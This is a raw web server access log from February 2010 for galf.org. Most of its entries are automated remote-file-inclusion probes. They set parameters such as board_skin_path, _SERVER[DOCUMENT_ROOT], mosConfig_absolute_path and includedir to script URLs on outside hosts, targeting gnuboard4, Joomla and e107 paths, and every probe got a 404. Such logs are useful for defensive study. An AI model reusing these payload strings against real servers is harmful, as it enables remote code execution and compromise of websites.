200.93.147.154 - - [07/Feb/2010:22:48:36 -0800] "GET /logs/access_091116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [07/Feb/2010:22:52:31 -0800] "GET /logs/access.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [07/Feb/2010:22:52:31 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [07/Feb/2010:22:52:31 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [07/Feb/2010:22:52:47 -0800] "GET /logs/access_100201.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:54:03 -0800] "GET /logs/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:54:03 -0800] "GET /http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:54:03 -0800] "GET /logs/access_090907.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:54:11 -0800] "GET /logs/access_091102.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:55:08 -0800] "GET /logs/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:55:08 -0800] "GET /http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:55:08 -0800] "GET /logs/access_090907.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:55:14 -0800] "GET /logs/access_091102.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:56:02 -0800] "GET /logs/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:56:02 -0800] "GET /http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:56:02 -0800] "GET /logs/access_090907.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:56:08 -0800] "GET /logs/access_091102.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:22:59:35 -0800] "GET /logs/access_090907.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:22:59:35 -0800] "GET /logs/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:22:59:35 -0800] "GET /http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:22:59:44 -0800] "GET /logs/access_091102.log%20%20/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:01:36 -0800] "GET /http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:01:36 -0800] "GET /logs/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:01:36 -0800] "GET /logs/access_090720.log/http://werner.mlsec.org//index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [07/Feb/2010:23:04:01 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [07/Feb/2010:23:04:04 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [07/Feb/2010:23:04:07 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:09:25 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:09:26 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:09:26 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.200 - - [07/Feb/2010:23:11:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:31 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:31 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:31 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:53 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:54 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:58 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:59 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:12:59 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:13:01 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:13:31 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:13:31 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:13:31 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:10 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.47 - - [07/Feb/2010:23:14:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "labia.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:32 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:32 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:32 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:49 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:51 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:51 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:51 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:59 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:14:59 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.47 - - [07/Feb/2010:23:15:59 -0800] "GET /actual/ HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "labia.galf.org"
200.93.147.154 - - [07/Feb/2010:23:16:17 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:16:17 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:16:17 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:17:15 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [07/Feb/2010:23:18:17 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [07/Feb/2010:23:18:17 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [07/Feb/2010:23:18:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [07/Feb/2010:23:20:04 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:20:12 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:02 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:17 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:17 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:57 -0800] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:21:57 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:02 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:02 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:02 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:18 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:38 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:22:43 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:23:10 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.59.163.57 - - [07/Feb/2010:23:24:35 -0800] "GET /logs/access_091116.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
209.59.163.57 - - [07/Feb/2010:23:24:36 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
209.59.163.57 - - [07/Feb/2010:23:24:37 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:26:22 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.59.163.57 - - [07/Feb/2010:23:27:26 -0800] "GET /logs/access_091019.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:30:38 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:30:39 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:30:39 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:30:39 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:30:46 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:30:51 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:30:51 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:30:52 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:31:08 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:31:08 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:23:31:08 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:10 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:10 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:10 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:12 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:12 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:12 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:21 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:21 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:31:21 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:31:25 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:28 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:28 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:23:31:28 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:32:01 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:01 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:01 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:01 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:01 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:02 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:02 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:09 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:09 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:33:16 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:34:26 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:34:26 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:34:32 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:34:53 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
